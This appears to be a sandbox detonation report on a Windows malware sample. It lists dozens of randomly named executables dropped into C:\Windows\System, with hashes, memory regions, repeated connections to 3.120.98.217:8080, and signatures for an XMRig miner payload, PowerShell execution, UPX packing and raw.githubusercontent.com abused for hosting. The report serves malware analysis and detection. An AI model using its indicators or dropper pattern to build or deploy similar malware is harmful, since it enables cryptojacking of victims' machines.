C:\Windows\System\WmWqCbZ.exe

C:\Windows\System\gXjVufC.exe

C:\Windows\System\gXjVufC.exe

C:\Windows\System\HEalTnh.exe

C:\Windows\System\HEalTnh.exe

C:\Windows\System\txTzItR.exe

C:\Windows\System\txTzItR.exe

C:\Windows\System\zeFGWVb.exe

C:\Windows\System\zeFGWVb.exe

C:\Windows\System\qzFOXur.exe

C:\Windows\System\qzFOXur.exe

C:\Windows\System\jSbhmKu.exe

C:\Windows\System\jSbhmKu.exe

C:\Windows\System\QgMrgxA.exe

C:\Windows\System\QgMrgxA.exe

C:\Windows\System\jWtEjst.exe

C:\Windows\System\jWtEjst.exe

C:\Windows\System\nSSNdha.exe

C:\Windows\System\nSSNdha.exe

C:\Windows\System\IzyTYwV.exe

C:\Windows\System\IzyTYwV.exe

C:\Windows\System\bcrTCnj.exe

C:\Windows\System\bcrTCnj.exe

C:\Windows\System\NgbNTCp.exe

C:\Windows\System\NgbNTCp.exe

C:\Windows\System\fCTdoEv.exe

C:\Windows\System\fCTdoEv.exe

C:\Windows\System\tOvBlsp.exe

C:\Windows\System\tOvBlsp.exe

C:\Windows\System\DnoYXNF.exe

C:\Windows\System\DnoYXNF.exe

C:\Windows\System\WfdPouL.exe

C:\Windows\System\WfdPouL.exe

C:\Windows\System\fbysBxV.exe

C:\Windows\System\fbysBxV.exe

C:\Windows\System\srUiXJO.exe

C:\Windows\System\srUiXJO.exe

C:\Windows\System\gtTjTDt.exe

C:\Windows\System\gtTjTDt.exe

C:\Windows\System\HmNVVCJ.exe

C:\Windows\System\HmNVVCJ.exe

C:\Windows\System\zzYpQHy.exe

C:\Windows\System\zzYpQHy.exe

C:\Windows\System\uPefmod.exe

C:\Windows\System\uPefmod.exe

C:\Windows\System\IfmCtEU.exe

C:\Windows\System\IfmCtEU.exe

C:\Windows\System\WxPYryS.exe

C:\Windows\System\WxPYryS.exe

C:\Windows\System\HUjIWSt.exe

C:\Windows\System\HUjIWSt.exe

C:\Windows\System\srGFXTJ.exe

C:\Windows\System\srGFXTJ.exe

C:\Windows\System\TSTcCCn.exe

C:\Windows\System\TSTcCCn.exe

C:\Windows\System\MSGupAa.exe

C:\Windows\System\MSGupAa.exe

C:\Windows\System\qjGjcdp.exe

C:\Windows\System\qjGjcdp.exe

C:\Windows\System\CiOrONi.exe

C:\Windows\System\CiOrONi.exe

C:\Windows\System\suhoKJK.exe

C:\Windows\System\suhoKJK.exe

C:\Windows\System\ccvcRkX.exe

C:\Windows\System\ccvcRkX.exe

C:\Windows\System\DVElklo.exe

C:\Windows\System\DVElklo.exe

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp

Files

memory/2020-0-0x000000013FCE0000-0x00000001400D6000-memory.dmp

memory/2020-1-0x00000000000F0000-0x0000000000100000-memory.dmp

C:\Windows\system\KTiikTj.exe

MD5 226ab5cb1323b5cc0e6c92143958a274
SHA1 7eaaf3951e10df976475db5b1ff59c8f87fcfa8c
SHA256 86a9412d1ac9ff302ba234ebc00e0610e0f45d73a204334c1313a63480ca6331
SHA512 aef534748a6a93eb2038063389b9b1618e5f5ae7bc5943e101e69b3f1ce145761b1b721baa1436fd0666ecabd50f78cbfd38f1fd4ec18985cedee591c7a0e0ff

memory/2020-10-0x0000000003240000-0x0000000003636000-memory.dmp

C:\Windows\system\ojzCDbz.exe

MD5 d7b62b2057a080b70c218ff7dd0cbf1f
SHA1 ee870d1aedc3bace7211b5a58dbfbcec9c9a4414
SHA256 075f62afb3b2b6cf31d478824ce394b545fcac2ce96f779131baa89e4c2e2e22
SHA512 41a01acf00eb5c92c22e5b7f95dff71891d676fbe3d9288930eb17852655c5c7efb7bfd67934db8b17b4f0e152003ad563eed2ce8e0c875becc447f2aaeb980a

C:\Windows\system\joopXcZ.exe

MD5 736efc686c99e34796f608ab196da0c8
SHA1 21c01657082dd6d207ec90b690da0e0da217a89d
SHA256 da8a9b3ccafbd749be07c5fa7931adec521e9f6865ae0fe532ccf5dbef24226f
SHA512 8a9568a2d2dd634695cef749d79fa042afe832fb6dbe33115212e2fe67adcd41a4fc531c7c73e9d177371ee3fcd402cc6badd25d0cc1cbc19754d6e79ed1d5b1

memory/3008-11-0x000000013FC00000-0x000000013FFF6000-memory.dmp

C:\Windows\system\ULyRwor.exe

MD5 74edfee464259a9ad3eadc92b131c570
SHA1 3c9fd68efccd5b1a49b7eb0dcf7b3e9d9650cb1a
SHA256 550e2d125198f15af2bd24e3ce50c71e445b06b89fa2dfeb4f614628837ecfc2
SHA512 ea644956ae2fe50589bdb814aea4937e6ad4fa86a2f0c8ba5d4525f9c1e023bf0b99d0b3261e84b884be6e96035efadf3986cfbc512817ff342139fd2ce1e952

C:\Windows\system\xKDaZJL.exe

MD5 62e0811582db8ed478369f4b865e654d
SHA1 4aa2b9410d51dc822de6df8eb4b19d6673d2ea8f
SHA256 821f3d2c21f12360b4c26f94fa4db535ac781fd596940e94544476809898ee21
SHA512 41a9b31f34513770e2c999322aa5d7e6374eb7c41b9c6c51d3c1eff85bb119c70dfa6fcf6f2ef898b170ae95203607be766c624034da6cd9d1bcedab97f784b3

C:\Windows\system\xzLITSS.exe

MD5 9a836fa9ad68d3633519c9b61c6da0fa
SHA1 f8619271114f3013d5a278d968158b312dd764c6
SHA256 88ed01632f73db40f51fed4042c05faebfa47265fbf6e30a6396fe44455c8d47
SHA512 54715d361bef23da68c2369b7b1609172f8f0eac0d48cc9f54b78cb7f3eed131a95c91c1d401f29f45709110f6732e90b52f7ffc5d18b1c6c000371fdf560941

C:\Windows\system\fExXtUj.exe

MD5 4f6dd4b2a4016f54b406032cd7ed006a
SHA1 357c719dd72c1b2db503ebf253bb9dfde9ab7629
SHA256 7b42996cd1ff7fa9c1509943703b2bf68e4b2e9c40c6dae8ccdcede1769b20b1
SHA512 557a3516d26a79bc3a70bd4e5556b1eb2d0d1f282fb12025dc133306c694f4c0beacad68fff6f9a4adcf59e349a60ad37c3dfbfe1703d5378bba02305eb92bf6

\Windows\system\tEOlqnL.exe

MD5 6ca2295ca58107c4b206c6d476ec4c1c
SHA1 8c1d9159114d565280de6311918e132c541bca91
SHA256 f2ea4cc5e312f17a3a901a3e6fa8db32ba6d4ee6c322a1c620076334ee3c8822
SHA512 99e5e60414de0a091925993181a4a9e886ba3b8c2c9b1221d8240fbf20d5bed40c3d33abf561660d5e41a2734af307eaee68d3ab5bf5d4e4a7c016c9af1d002b

C:\Windows\system\rslSVrA.exe

MD5 afaeefddb710d60f363ea5406ba595db
SHA1 d7cad4809ab66e81414d8511b1daf6e5b6842e0f
SHA256 19a10b94dda4b2c8987c3422f3a0c21e4494d7d0f94bcf55e34472b6d49a705a
SHA512 66d8306fb7c13444317c4cf6e2a7c11941c6a9cd08493385145887364b602a1417a8b0f6f77886400c353161cfccd54e72628b0e59aa6de47a5c269431d3e8d3

C:\Windows\system\FpgEaDw.exe

MD5 acf3147a58d1cd3443a89e616e8ab746
SHA1 60db96e7cb21753736270c31d14eee65de1a6a75
SHA256 c23666f70b04b60e2585f3389c4ecdd6efe681e55f251a822873053989d521d1
SHA512 d13396a8e8336f0e163df4710a090f95f61298bdc57d594d761e4723adbf9bf0e84287b29e30fe17fd0838f97b406d53674f09a352b5a8a6f6135808b65a64d2

C:\Windows\system\YdNalBW.exe

MD5 ded4a8dce60e3e90d8bec0ee664146b7
SHA1 851e7007ff49107eacac3787822845b3d9c13e26
SHA256 2d9cdd30c410fd7e2905d7bbc76c01e5d63951bc5d586d9a385662f2f4f923cb
SHA512 01d3a781b3161a1fa3923d96802c817a157809b9c9fff936fe65ddf10152fd71a1a1128a6177198d9c75a5376fd18a80928200a259ec785692961241879ae3ba

C:\Windows\system\TAWkIve.exe

MD5 5ffd1bd514d317eaaa6ac9fb82a92529
SHA1 7a24a84ff4596cb71ae13f734b99ecc3bf22ee79
SHA256 ae3a09f852a5f05db029b8070270305c3d374aa5eaca6e4a2d97a4af8535d98b
SHA512 866937f327d380b2b8ca754ce69048a6e1f49b180a2e31fdea73d40d6387cdfc8a9e277e70d19e58425bb43001321b6a85c3134594e6bcd0debae3b656522e7c

memory/2980-124-0x00000000020D0000-0x00000000020D8000-memory.dmp

\Windows\system\BOZpDWW.exe

MD5 5d90d00c0e9eddc312a69b66fa450977
SHA1 12980f84d66a2d6ef1746377166f65b9241b9dd2
SHA256 2e791566d66dcc34912ad721a0420f116857e0ce1cee7ca53a2b0749986dc73d
SHA512 869a6d040bf6d1928aaf82e7a573a72c98807e641e14a4ce80c8cbdb9390ac2515672f8365916c6b09b67271ad7cfc9e9dbbb86c670e9fe7749cbd42bb48fefb

C:\Windows\system\rFQPYLk.exe

MD5 d4f5f7f59d06ef2004cb21400ab6ab15
SHA1 402aa0a97d335d03d8282686ed74585a5047c17e
SHA256 4a53de78a5b60df00547b5de5a365f08c29182477bbf695c0b6633072e3203e0
SHA512 22e278efb2f4879c6995b1831e117ff1ec4e872ab5e15c87a9eb846c11773b5bcaf1ac1a854b8980626425eeae502b81b946649cd4bbd3ce96b586c86585a8cb

\Windows\system\YjAqmPI.exe

MD5 d9f2fcdc4f179559d7fd518b6643bcdc
SHA1 95e0103d158e27b28329b4c9e68530b3e66a0383
SHA256 8207762102e5cce55ea99d4268ab6e922d0efca2ae7ac008dccca3ccfc4f54f6
SHA512 4118cb6d4fccd76f9cc1ecd3985f602b7e15868a3e367ff58d62da2191b8d6fe03b50750310352344aa1f0b41ac48e1b2cf393a9624a7e26e83f914426298aea

C:\Windows\system\gTHOUSB.exe

MD5 b8a096a0ff66c4830744d8c0086f3817
SHA1 671e877304d2ad6b99a685dde1793d18ee264cf6
SHA256 6796a83c8aba04bb4caf3951cb1b7aee6d8eac6ead5ddbc3d105ae3d667a65ee
SHA512 61c934e1b2151461e8ab3ed647bb86f7043e238a28943105afc44f895108db32762bb506e5d32d358a7fa4c0cea3f3cf796319c07c132678af1c241fe896cf95

C:\Windows\system\lfXQeTY.exe

MD5 79bddd31bc9ef2129e31d0bd4270cfec
SHA1 3826676e82aeac7fa59bc2a67a4d6c76fdc95216
SHA256 6b82a2b293e285055e2a89d9c1ae49fba97a93619c58ef8489ddc404adb99a0f
SHA512 cfb2ebaf73e12b5421f1926fbb711d4272ede39a3e44f1b71654b64b43b7d008c5c9cb8a4cded3130b2a84734a76dc96738335748ca910def44ce0aaa1cf2342

memory/2980-187-0x000007FEF53B0000-0x000007FEF5D4D000-memory.dmp

memory/2980-190-0x000007FEF53B0000-0x000007FEF5D4D000-memory.dmp

memory/2524-191-0x000000013F1D0000-0x000000013F5C6000-memory.dmp

memory/2736-193-0x000000013F890000-0x000000013FC86000-memory.dmp

memory/2020-196-0x0000000003240000-0x0000000003636000-memory.dmp

memory/2576-195-0x000000013F580000-0x000000013F976000-memory.dmp

memory/2692-207-0x000000013FD80000-0x0000000140176000-memory.dmp

memory/2020-212-0x000000013F6E0000-0x000000013FAD6000-memory.dmp

memory/2728-211-0x000000013F0B0000-0x000000013F4A6000-memory.dmp

memory/2020-210-0x000000013F0B0000-0x000000013F4A6000-memory.dmp

memory/2020-194-0x000000013F580000-0x000000013F976000-memory.dmp

memory/2020-192-0x000000013F890000-0x000000013FC86000-memory.dmp

memory/2980-220-0x000007FEF53B0000-0x000007FEF5D4D000-memory.dmp

memory/2020-206-0x0000000003480000-0x0000000003876000-memory.dmp

memory/1516-205-0x000000013F3E0000-0x000000013F7D6000-memory.dmp

memory/2020-204-0x000000013F3E0000-0x000000013F7D6000-memory.dmp

memory/2460-203-0x000000013F1A0000-0x000000013F596000-memory.dmp

memory/2020-202-0x000000013F1A0000-0x000000013F596000-memory.dmp

memory/2440-201-0x000000013F710000-0x000000013FB06000-memory.dmp

memory/2020-200-0x000000013F710000-0x000000013FB06000-memory.dmp

memory/2464-199-0x000000013FFE0000-0x00000001403D6000-memory.dmp

memory/2020-180-0x000000013F1D0000-0x000000013F5C6000-memory.dmp

memory/2980-177-0x000007FEF53B0000-0x000007FEF5D4D000-memory.dmp

C:\Windows\system\oGdWdwB.exe

MD5 2e8760082a5109d550ba108a225ee5c7
SHA1 794ed5f0703770d21b138a1e4dd150ac79242519
SHA256 d9c7c6f7d36fd4a22bc673e03bdecb17c5d092d87410d1527a69ef035443fb1e
SHA512 41b4901ed335b49d51eadf5fd8381a8ce5a16375415f4ae12c21c9ea85578ada4d69d790910cb4a0e6c5716fb2e16890ab1bdfe7af9690cf862d264657008c28

C:\Windows\system\eZxfgdn.exe

MD5 d611f12b17a156535291644043627c3b
SHA1 8ff413c46177eabe40fccedb890a9eb095d6dffc
SHA256 58a87c1141a278e154d59de614b7f6e6fbdc7135d51f8b13cd8c08d7c0b58c32
SHA512 68942679672a105971ed688c0b651e47dfb5a6d25e3c9d73c857594f87a101f822e5e482b403998b27d8bb77ac85725d0c9866c9d728660b268aeffc66e133c8

memory/2980-153-0x000007FEF566E000-0x000007FEF566F000-memory.dmp

memory/2672-149-0x000000013F6E0000-0x000000013FAD6000-memory.dmp

C:\Windows\system\QjpoHkM.exe

MD5 764aef4cd22313538fb80b786449681c
SHA1 e3cc5a5be9d2e077e595414295d0cde97048d7f5
SHA256 4f4c37b73a6fa869ab1c8e7949954d2193ed4aa9ae4e17bd0a80ccc736742fdf
SHA512 80a60b123bc45505545a49765a8daba6726b07556bb2db22888ed85967f9d991f8d38e06fc1d2a5075b099f110c3bc2f48eb7e33cbfebba28015776aea11cdf2

C:\Windows\system\ouvCBJc.exe

MD5 98f6a78ecf5ab915cc1e8f6230cbeec3
SHA1 ea09343dd619dbdba731d02ebc64985ceb1acd2f
SHA256 b67cf8b8c71e0def660d24b3e34b39ee8aa7c2a69a812643f64789df12a838ab
SHA512 6304c6eee14492e2b124b18143c7e4b60a1b3da27f83139687da93ee4fa27db9356f08a071cc99edd22071fe6e6468616e8007605b0026b050a622e15c92ffda

memory/2556-144-0x000000013F710000-0x000000013FB06000-memory.dmp

C:\Windows\system\SpCSNSe.exe

MD5 a01c54283c78bc96410301158b19ed32
SHA1 6c340a3a41697639ea238f54db00f05a8903a14c
SHA256 fcc3c6692dd04ad17a0b128169d1d3466b3e9203b1fc519c52cf9d957e13319d
SHA512 76e376812e20f07bcfb40880d80be244c2f27ba6b5314fabe697789392283e22cad74ae87a184755ee5465b48fa6d4756b02eef843c5323705044d1b78454653

memory/2980-117-0x000000001B630000-0x000000001B912000-memory.dmp

C:\Windows\system\vAJRPkt.exe

MD5 20bc5ad96153a0727d175e410755b719
SHA1 65bc5897564c1956120d1af7d95886560a35e811
SHA256 9da5bb4c42388cdca6daa2b2721d3d4cc8bc1b9b8f5719c4cb7f674bddb5d560
SHA512 938ae32c1faf7f72cd27ce2c8044278858fcb87d2a78c08dd2a1641e75148307eb9d13d9590e9475e0adf44ec67ea785988ef85c837f377bf03e52e65303af81

C:\Windows\system\GKwKyLt.exe

MD5 fca7ab862cf69d25f755160eca442f38
SHA1 a4345ce372b1a3a00950badbaf43d0c8276ae772
SHA256 8c247754c74b1aa7e294ac3ed9330b62552c43ad94f0441d87712c4363a5a75f
SHA512 11930674522ee8a3529ff08696face306f3cd6ad44ea7699725e565f272aef5e196a3efb5f5427458ac6e86a778c6cf2ab79c40c11d6b0fee4b9123b2ecb419a

C:\Windows\system\kcIiPuP.exe

MD5 05a81e7d9f52c46f4d4385c337992585
SHA1 2528d63fda460fa2f5386ac63d93c48566c17fd4
SHA256 d565e0a830813f29bca41a14b13016c79d05405a5a8acd1f751b5909d7d3220a
SHA512 d56c8a6a0a4eb8f595fc22a49f308df82ca8eeab035a4d18db3dff400f67787bbba58b38527179f7ea86a5336b8d81f40f4f7c385f2b735b8e471761ed5ee752

C:\Windows\system\rIklBoa.exe

MD5 f65acafa6630650e08a9f75569bc6254
SHA1 be45eacf81862808b8160da7c35a5badc7c1a4a6
SHA256 153b51d349ff943c2f2c94d68165cfe321ba2239588d8469e44052d6d77f1428
SHA512 a7339a480206dd0835cca4ff60f2546136e93ae418bb1b33675c2f0f2e5ae740906337e2dbad5ef9f49c264f0885f0e899fb44dbf7feeb6622482ffda5f94d77

C:\Windows\system\CTQymvh.exe

MD5 85e044cff419a58f6640a3d581b9cc89
SHA1 1b8e141724821f19bfd587604824d89917235819
SHA256 c43d24fd1095f06ee5977fcaf702c1d75c7c85ecda854ad62353ffd2e97186bc
SHA512 f072aec6768a1b3a56bcf7ff7a4e9ac778cfa1a7e47ed22d65886b3fed565425a8eb624f5f23365e67017f74f4caee5b4346c953a1c08beec027ca6dbd38e396

C:\Windows\system\DoHbCaH.exe

MD5 6c455322dd3f7fc853d6c990f7c4f245
SHA1 23a2222179f4fa68bd50dc4041b516269045aee3
SHA256 a8970a22c76328ab793a30aa83c86a92d913534416b565a72161acd2812caa91
SHA512 e3e408a93cc112a7e2224a41a407aab07b3ea86e3a5290e3e836310bb6578739e06daf3af7c6d482509627c5b98b394f63e90452a48323b92a4f9b435b41a61a

C:\Windows\system\wymELJz.exe

MD5 4f860173f8578ee0ee00a0238d574e5d
SHA1 8611a14f906ca07d43884073d558c5a7237d9d6f
SHA256 813df8e91edb3276c0afa944d2568323652f988f3cc1c910b7b80492bcd4aee6
SHA512 c537a798f0a698ec0489553cb5444fa0f1d309e3f17da7ba7aab69017049f9abd06548389c9aef14229339d37cd0911ab9de998cd5dcf2be932c97d782ef5dc0

C:\Windows\system\fMowbqv.exe

MD5 7d0be1582d8f52ce4d520e83221ab9bd
SHA1 2f11f4c4781d8d84d51a0638db1a90b0d95f9a8e
SHA256 d05bdfa1e53cd9ef7a26fef607b1738821ef56029bb2ced2a0cca5417b36cc8e
SHA512 f98208040f3a61475e8d0f06d5af9d381a176cfed4d226648de6f09c93b334fde565f8b116589848cc0616cf00657f10825d7e892e43cddc1d185b7e2924ac76

C:\Windows\system\rdDKznI.exe

MD5 07ecd15088ee0753e46f5457f59e4ad3
SHA1 73efb5de404934c31ffc46075177a6c4fac00446
SHA256 70573c6a915a5df06eef6ef1388df8592f7090d71125fa010e139d2b287d05ff
SHA512 66a29a6e5c33ca2ae63a2b4c0808b335089c11bae9f06a0e0fa51212d529e47430c1cde24fdcc6b3236aed903d9dcf2314e6f5c8d89c1c97fed91fa29f51b9ff

C:\Windows\system\apYRFGp.exe

MD5 581ea325c4a5b291a48af5c00aa2456d
SHA1 8a3023d84d421d239aad2a9f44236403204b9f35
SHA256 128c1c1b5abb73bfbde0edc5530fb71ec7995a3e0315c9cdcd30304b2cfc7d34
SHA512 d99fcf85eefd52387df6a14b64c5bd556fc6befbf7d6fdfc52c36704f9bcc0cb06426db3a85a392d7da275225d1a1214ed35a21d95264ee3872bb9650bf4e63f

memory/3008-5660-0x000000013FC00000-0x000000013FFF6000-memory.dmp

memory/2020-5677-0x0000000003480000-0x0000000003876000-memory.dmp

memory/2020-6223-0x000000013F6E0000-0x000000013FAD6000-memory.dmp

memory/2672-8041-0x000000013F6E0000-0x000000013FAD6000-memory.dmp

memory/1516-8071-0x000000013F3E0000-0x000000013F7D6000-memory.dmp

memory/2524-8044-0x000000013F1D0000-0x000000013F5C6000-memory.dmp

memory/2692-8108-0x000000013FD80000-0x0000000140176000-memory.dmp

memory/2576-8042-0x000000013F580000-0x000000013F976000-memory.dmp

memory/3008-8046-0x000000013FC00000-0x000000013FFF6000-memory.dmp

memory/2736-8045-0x000000013F890000-0x000000013FC86000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-22 13:20

Reported

2024-05-22 13:22

Platform

win10v2004-20240426-en

Max time kernel

147s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\CysOyxs.exe N/A
N/A N/A C:\Windows\System\OrrRtug.exe N/A
N/A N/A C:\Windows\System\SQovDfo.exe N/A
N/A N/A C:\Windows\System\fDBNyfx.exe N/A
N/A N/A C:\Windows\System\gJrKYYU.exe N/A
N/A N/A C:\Windows\System\AmdSLnc.exe N/A
N/A N/A C:\Windows\System\NSTnlVS.exe N/A
N/A N/A C:\Windows\System\rjdwPsC.exe N/A
N/A N/A C:\Windows\System\ZTeetps.exe N/A
N/A N/A C:\Windows\System\wHCmOWC.exe N/A
N/A N/A C:\Windows\System\xsEjqQk.exe N/A
N/A N/A C:\Windows\System\quxsThd.exe N/A
N/A N/A C:\Windows\System\vaWeTar.exe N/A
N/A N/A C:\Windows\System\dmQIdol.exe N/A
N/A N/A C:\Windows\System\sjkRbnC.exe N/A
N/A N/A C:\Windows\System\VwxtFgm.exe N/A
N/A N/A C:\Windows\System\VDFHWSw.exe N/A
N/A N/A C:\Windows\System\dzHZXzu.exe N/A
N/A N/A C:\Windows\System\Vapqwyk.exe N/A
N/A N/A C:\Windows\System\nnYjYoa.exe N/A
N/A N/A C:\Windows\System\iQZhPrV.exe N/A
N/A N/A C:\Windows\System\sGAqzsS.exe N/A
N/A N/A C:\Windows\System\wchFWCt.exe N/A
N/A N/A C:\Windows\System\grpsppv.exe N/A
N/A N/A C:\Windows\System\cndSdfF.exe N/A
N/A N/A C:\Windows\System\doYbrVO.exe N/A
N/A N/A C:\Windows\System\AqqrKFW.exe N/A
N/A N/A C:\Windows\System\AOpddHT.exe N/A
N/A N/A C:\Windows\System\mYGfJGb.exe N/A
N/A N/A C:\Windows\System\CcUkXAS.exe N/A
N/A N/A C:\Windows\System\HKrmxif.exe N/A
N/A N/A C:\Windows\System\sqkzUjB.exe N/A
N/A N/A C:\Windows\System\qzNXzZX.exe N/A
N/A N/A C:\Windows\System\QudWmhI.exe N/A
N/A N/A C:\Windows\System\MpaBtRz.exe N/A
N/A N/A C:\Windows\System\cuaDZbj.exe N/A
N/A N/A C:\Windows\System\DyeLlGe.exe N/A
N/A N/A C:\Windows\System\RZxFSXk.exe N/A
N/A N/A C:\Windows\System\HuOQcZI.exe N/A
N/A N/A C:\Windows\System\FbOygah.exe N/A
N/A N/A C:\Windows\System\ImsdVtJ.exe N/A
N/A N/A C:\Windows\System\ApkOqZC.exe N/A
N/A N/A C:\Windows\System\PNwmbNz.exe N/A
N/A N/A C:\Windows\System\DZRkWgc.exe N/A
N/A N/A C:\Windows\System\Nqtjhxt.exe N/A
N/A N/A C:\Windows\System\HsanxJo.exe N/A
N/A N/A C:\Windows\System\EVkQepN.exe N/A
N/A N/A C:\Windows\System\KSHaUBO.exe N/A
N/A N/A C:\Windows\System\BhkCIbE.exe N/A
N/A N/A C:\Windows\System\MqCCqrT.exe N/A
N/A N/A C:\Windows\System\xNVtWdw.exe N/A
N/A N/A C:\Windows\System\NHEYKhZ.exe N/A
N/A N/A C:\Windows\System\KPZYmIH.exe N/A
N/A N/A C:\Windows\System\euijXcP.exe N/A
N/A N/A C:\Windows\System\apfTTKH.exe N/A
N/A N/A C:\Windows\System\lCpEHHa.exe N/A
N/A N/A C:\Windows\System\TjGNyIY.exe N/A
N/A N/A C:\Windows\System\IcqrUGS.exe N/A
N/A N/A C:\Windows\System\iVdmTkc.exe N/A
N/A N/A C:\Windows\System\TXObsHt.exe N/A
N/A N/A C:\Windows\System\sJWlyyt.exe N/A
N/A N/A C:\Windows\System\XchTFlH.exe N/A
N/A N/A C:\Windows\System\ZhEBUZn.exe N/A
N/A N/A C:\Windows\System\eDGKVCW.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\PCZqvie.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\swDBsZv.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\iuXYScO.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\nDxdHqX.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\YCEBfcQ.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\aKPWLzg.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\OBGHwLf.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\nEMqjHh.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\BIZQhNg.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\kmsagUq.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\eXKbHfJ.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\mRxOLAW.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\rxWQIzg.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\bSVsgWz.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\atPwDbv.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
